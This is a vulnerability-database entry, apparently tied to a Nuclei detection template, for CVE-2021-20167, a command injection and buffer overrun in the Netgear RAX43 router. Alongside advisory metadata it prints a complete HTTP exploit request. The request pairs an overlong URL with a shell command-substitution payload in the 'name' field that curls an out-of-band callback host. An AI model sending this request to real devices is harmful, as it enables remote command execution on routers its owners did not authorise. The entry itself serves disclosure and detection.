🔙 목록으로 돌아가기

CVE-2021-20167: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun

TitleNetgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
Authorgy741
SeverityHigh
ImpactAuthenticated attackers can execute arbitrary commands on the router, potentially compromising all network traffic and connected devices.
RemediationUpgrade to newer release of the RAX43 firmware.
CVSS Score8
EPSS Score0.79422
CVE IDCVE-2021-20167
CWE IDCWE-77
Tags cve2021 cve tenable netgear rce router vkev vuln

🔍 Vulnerability Description

Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.

🌐 HTTP Request

POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 81
Accept-Encoding: gzip

"name":"';$(curl d5jn4m1le0o4ut4qta50otd5turwx9ztj.oast.fun);'",

"email":"a@b.c"

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20167.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-20167.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A